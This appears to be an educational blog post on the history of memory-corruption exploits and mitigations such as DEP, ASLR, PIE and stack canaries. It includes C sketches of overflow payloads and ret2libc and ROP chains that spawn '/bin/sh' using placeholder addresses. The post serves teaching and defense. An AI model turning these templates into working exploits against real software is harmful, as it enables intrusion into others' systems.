Although computer hackers have been breaking into systems, disabling and attacking networks, stealing intellectual property, and taking control over compromised systems for decades, the modern era of cyber-security only started in the ‘90s. But even in the early days of the new era, computer hacks were split into two main categories: social engineering and program exploitation, which continue to encompass almost all contemporary attacks. These two groups can be best explained by an example of each.

Social Engineering


The ILOVEYOU worm was a malicious script named “LOVE-LETTER-FOR-YOU.txt.vbs”, which spread as an email attachment disguised as a harmless text file. A certain level of user interaction (namely, opening and running the attachment) was required for a machine to become infected.

Program Exploitation

In contrast, the Morris worm exploited a flaw in a legitimate computer program, the finger network daemon (fingerd), to gain full control over a target system. Absolutely no user interaction is required; the process is fully automated, and little more is needed than for the vulnerable system to be connected to a network! A weaker cousin of this type of attack is also used to deface and shut down web servers.

Social engineering tactics have barely changed since their inception, while program exploits have undergone several quantum leaps in under twenty years. Therefore, I’ll focus solely on binary exploitation techniques for the remainder of this post.

The Good Old Days

In 1996, computer security expert Elias Levy, better known by the alias Aleph One, submitted an article entitled Smashing the Stack for Fun and Profit to the hacker magazine Phrack. It was the first detailed, public description of both how buffer overruns work and how to leverage them to gain total control over the target system (this was the vulnerability class exploited by the Morris worm).

On many C implementations it is possible to corrupt the execution stack by writing past the end of an array…  Code that does this is said to smash the stack, and can cause return from the routine to jump to a random address.  This can produce some of the most insidious data-dependent bugs known to mankind.

This flaw, caused by a programmer allowing more data to be written than space was allocated for, corrupts the internal state of the program. In the days of Aleph One, once a hacker found such a bug, he would proceed by overwriting the return address of a function. Understanding this requires a brief digression into compilers:
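To make the flaw concrete, here is a minimal sketch in C of the kind of bug Aleph One described (the function name and buffer size are invented for illustration): the program reserves a fixed-size buffer on the stack, then copies attacker-controlled input into it without ever checking the input’s length.

    #include <string.h>

    /* Hypothetical example: 'name' arrives from the network or the command
     * line and is fully controlled by the attacker. */
    void greet(const char *name)
    {
        char buffer[64];        /* only 64 bytes are reserved on the stack   */
        strcpy(buffer, name);   /* but strcpy() copies until it finds a NUL  */
                                /* byte, so a longer 'name' writes past the  */
                                /* end of the buffer and corrupts the stack  */
    }

    int main(int argc, char **argv)
    {
        if (argc > 1)
            greet(argv[1]);
        return 0;
    }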

When a function is called, the program sets up a semi-isolated environment in which that function runs (known as the function’s stack frame). Before the function begins, however, the program records its current location and writes that address to memory, the idea being that once the function ends, the program can simply look up the saved address of where it was before the function call (the stored return address) and resume where it left off.

However, as the aforementioned buffer overrun allows an attacker to change the program’s internal state, hackers can change the stored address to redirect execution to their own malicious code!
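Assuming the hypothetical 64-byte buffer from the sketch above, a 64-bit machine, and an 8-byte saved frame pointer sitting between the buffer and the return address (the exact offsets depend on the compiler and platform), the attacker’s input might be built roughly like this:

    #include <stdint.h>
    #include <string.h>

    /* Illustrative only: offsets and addresses vary by compiler and platform. */
    unsigned char payload[64 + 8 + 8];   /* buffer + saved frame pointer + return address */

    void build_payload(uintptr_t malicious_code_addr)
    {
        memset(payload, 'A', 64 + 8);       /* filler up to the saved return address  */
        memcpy(payload + 64 + 8,            /* overwrite the saved return address so  */
               &malicious_code_addr,        /* that the function "returns" straight   */
               sizeof malicious_code_addr); /* into the attacker's injected code      */
    }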

The Dawn of Exploit Mitigations

Before a hacker can fully exploit a buffer overrun, he needs malicious code to already be within the program’s memory. While this may seem like it would stop would-be hackers in their tracks, early computers made absolutely no distinction between data and executable code, allowing hackers to disguise injected machine code as ordinary data. In response to the proliferation of hacks exploiting buffer overruns, security vendors began distributing early protections, both in software (the PaX team in 2000) and in hardware (Intel and AMD in 2004), known as DEP/W^X/NX/XD/AVP (quite a lot of different names). This protection added a systematic distinction between code and data, mandating that every page of memory could be writable or executable, but never both. It was believed that this would forever stop programs being exploited and hacked, but all it did was start an arms race.
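As a rough POSIX-flavored illustration of what W^X means in practice: code that legitimately needs to generate machine code (a just-in-time compiler, say) must now write the bytes first and only afterwards flip the page to executable; an ordinary writable buffer never becomes executable, so injected shellcode has nowhere to run.

    #include <string.h>
    #include <sys/mman.h>

    /* A page is either writable or executable, never both at once. */
    void *make_code_page(const unsigned char *code, size_t len)
    {
        void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE,   /* writable, NOT executable */
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED)
            return NULL;

        memcpy(page, code, len);                                 /* fill it while writable */

        if (mprotect(page, 4096, PROT_READ | PROT_EXEC) != 0)    /* now executable, and no  */
            return NULL;                                         /* longer writable         */
        return page;
    }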

Payload Already Inside: Introduction to Code Reuse Attacks

Now that they could no longer directly insert and run arbitrary code, hackers realized that they still had a way to get the target application to execute specific instructions: ret2libc. The crux is that, since they could shape the program’s internal state however they wanted, hackers could forge arbitrary calls into powerful system-level libraries that were already loaded, in effect telling the program to “resume execution” inside the library itself!

The canonical example, and the one from which this technique draws its name, is forging a call to libc’s system() with the string “/bin/sh” as its argument, which hands the hacker an interactive command session on the target machine.
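A sketch of the classic 32-bit layout follows; the addresses are invented, but on a real target they would simply be read out of the loaded C library. The overwritten return address points at system(), the next word is the address system() will “return” to when it finishes (here exit(), to avoid a telltale crash), and the word after that is where system() expects to find its argument.

    #include <stdint.h>
    #include <string.h>

    /* Hypothetical addresses inside the target's C library. */
    #define SYSTEM_ADDR  0xb7e42da0u   /* address of system()          */
    #define EXIT_ADDR    0xb7e369d0u   /* address of exit()            */
    #define BINSH_ADDR   0xb7f83a24u   /* address of "/bin/sh" in libc */

    unsigned char payload[64 + 4 + 12];

    void build_ret2libc(void)
    {
        uint32_t chain[3] = { SYSTEM_ADDR, EXIT_ADDR, BINSH_ADDR };

        memset(payload, 'A', 64 + 4);                    /* fill the buffer and saved frame pointer */
        memcpy(payload + 64 + 4, chain, sizeof chain);   /* the forged "call" to system("/bin/sh")  */
    }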

Randomization Based Defenses

The next wave of protections was based on removing knowledge critical to the attacker’s control. In direct response to the rise of ret2libc, software and operating system vendors began shuffling the addresses of libraries every time a program is run. Suitably called ASLR, or Address Space Layout Randomization, this for a time completely threw a wrench into the underlying idea behind ret2libc: how can you tell the program to resume execution in the library if you don’t know where the library is?

However, the story doesn’t end here. Much as hackers had learned to reuse code from loaded libraries rather than injecting their own, particularly savvy researchers and attackers noticed that they could chain together small snippets of machine instructions from the program’s own code, a technique now known as return-oriented programming (ROP), essentially making the program a bootloader for a custom virtual machine! The instruction snippets that compose a program have no idea that they’re being executed in a very odd order, and will happily compute and then pass execution on to the next snippet. Significantly, this requires absolutely no interaction with a third-party library, and because early ASLR left the program’s own code at a fixed address, it bypasses all of the protections mentioned so far!
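A sketch of such a chain, now commonly called a ROP chain, might look like the following on x86-64. Every address is a hypothetical location of a tiny instruction sequence ending in ret (a “gadget”) inside the non-randomized program image; each ret pops the next address off the stack, so laying the addresses back to back executes the gadgets in the attacker’s chosen order.

    #include <stdint.h>
    #include <string.h>

    /* Hypothetical gadget and symbol addresses found in the program image. */
    #define POP_RDI_RET  0x00401823u   /* gadget: pop rdi ; ret                 */
    #define BINSH_STR    0x004a10e0u   /* the bytes "/bin/sh" inside the binary */
    #define SYSTEM_PLT   0x00401050u   /* the program's system() PLT entry      */

    uint64_t chain[] = {
        POP_RDI_RET,   /* load the next word into rdi, then return...         */
        BINSH_STR,     /* ...placing "/bin/sh" in the first argument register */
        SYSTEM_PLT,    /* ...and finally "return" into system("/bin/sh")      */
    };

    unsigned char payload[64 + 8 + sizeof chain];

    void build_rop_payload(void)
    {
        memset(payload, 'A', 64 + 8);                    /* filler up to the return address */
        memcpy(payload + 64 + 8, chain, sizeof chain);   /* the chain takes over from there */
    }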

Continuing this cat-and-mouse game, the protection intended to beat this bypass arrived under the name PIE, short for Position Independent Executable. Without introducing any groundbreaking new tactics, it nonetheless hindered hackers by randomizing the address of the program itself. Without any foothold to stand on, attackers either had to blindly guess the randomized offsets (where being off by even one byte means complete failure), or had to leak the internal state of the program to defeat the randomization.
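Leaking is usually the practical option: since randomization only shifts an entire image by one secret offset, disclosing the run-time address of any single known symbol reveals where everything else in that image lives. A sketch, with hypothetical offsets that an attacker would read out of the binary ahead of time:

    #include <stdint.h>

    /* Hypothetical fixed offsets of two symbols inside a randomized C library. */
    #define PUTS_OFFSET    0x84420u
    #define SYSTEM_OFFSET  0x52290u

    uintptr_t locate_system(uintptr_t leaked_puts_addr)
    {
        uintptr_t libc_base = leaked_puts_addr - PUTS_OFFSET;   /* undo the randomization     */
        return libc_base + SYSTEM_OFFSET;                       /* every other symbol follows */
    }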

Canaries and Coal Mines

There’s another critical randomization-based defense, but because it has a fundamentally different design philosophy from the protections above, I thought it best to treat it separately. Known as Stack Canaries, this defense mechanism performs a sanity check on the stack before a function is allowed to complete. (Under the hood, the compiler writes a long pseudo-random value just in front of the saved return address and checks that this value hasn’t changed before it allows program execution to resume.) If this check fails, the program is forcibly terminated before the hacker can redirect its execution flow, thus stopping the hack at its moment of conception!
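Roughly, the compiler-inserted check behaves like the sketch below. The real check is emitted directly as machine code and the exact stack layout is up to the compiler; __stack_chk_guard and __stack_chk_fail are the names GCC, Clang, and glibc use for the shared random value and the abort routine.

    #include <stdint.h>
    #include <string.h>

    extern uintptr_t __stack_chk_guard;    /* per-process pseudo-random value */
    extern void __stack_chk_fail(void);    /* terminates the program          */

    void greet(const char *name)
    {
        uintptr_t canary = __stack_chk_guard;   /* prologue: copy the canary onto the  */
        char buffer[64];                        /* stack just below the return address */

        strcpy(buffer, name);                   /* a linear overflow must trample the  */
                                                /* canary before it can reach the      */
                                                /* saved return address                */

        if (canary != __stack_chk_guard)        /* epilogue: verify before returning   */
            __stack_chk_fail();                 /* mismatch: kill the process          */
    }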

Though much simpler to implement than any of the protections above, the canary has been one of the most damaging to attackers, being almost impossible to bypass via buffer overruns alone if correctly configured. This result bodes well for the general class of defense to which canaries belong: control flow guards. While DEP, ASLR, and PIE are general-purpose defenses meant to make it harder for hackers to convert control over the runtime path of the program into full control of the application, control flow guards seek to prevent programs from ever deviating from well-defined execution paths. This is currently a high-profile area of research with no clear solution in sight, yet it is one of the only approaches with the potential to stop all hacks, of (nearly) all types, for all time!

The vulnerability class this post has focused on remained the leading underlying vulnerability in zero-day exploits until 2008, when it was supplanted by a more customizable, powerful, and dangerous successor: use-after-free. While not intrinsically more dangerous than a buffer overrun, this vulnerability allows attackers to circumvent several protections specifically targeted at the earlier, more common exploitation vectors. For instance, canaries have utterly no impact on the exploitation of use-after-free bugs, and this type of vulnerability allows hackers to defeat randomization-based defenses by leaking program memory. Several novel defenses, in particular heap isolation, are having a fair degree of success in quashing use-after-free bugs, but these protections, too, are being struck down.
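For reference, a minimal sketch of the bug class (the structure and names are invented): an object is freed, a stale pointer to it survives, and the allocator recycles the memory underneath it.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    static void normal_close(void) { puts("session closed"); }

    struct session {
        void (*on_close)(void);   /* a function pointer stored inside the object */
        char  name[56];
    };

    void demo(void)
    {
        struct session *s = malloc(sizeof *s);
        s->on_close = normal_close;          /* legitimate setup                      */

        free(s);                             /* BUG: the object is released, but the  */
                                             /* pointer 's' is still kept around      */

        char *spray = malloc(sizeof *s);     /* the allocator may recycle the very    */
        memset(spray, 'B', sizeof *s);       /* same chunk for attacker-chosen data   */

        s->on_close();                       /* use after free: the call goes through */
                                             /* whatever now occupies that memory     */
    }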

There are volumes of theory about exploit mitigations and how to bypass them, far too much for a single post. However, it suffices as a closing remark that these attacks are far more than academic concerns. Even the most stringent protections are routinely bypassed in modern applications. Malware analysts have identified novel exploitation techniques being used in the wild as recently as last month, and even the combination of every defense method discussed above, and more, has been bypassed in hacker competitions. The future, it seems, is a rapidly changing place. It’s getting harder to find bugs before they become in-the-wild exploits, and the lucrative market for zero-day exploits continues to grow. With the stakes rising, everyone is suddenly playing an extremely dangerous game. Every company, regardless of scope, is directly connected to the Internet. But no framework is without flaws, so how long before hackers have a direct line to you?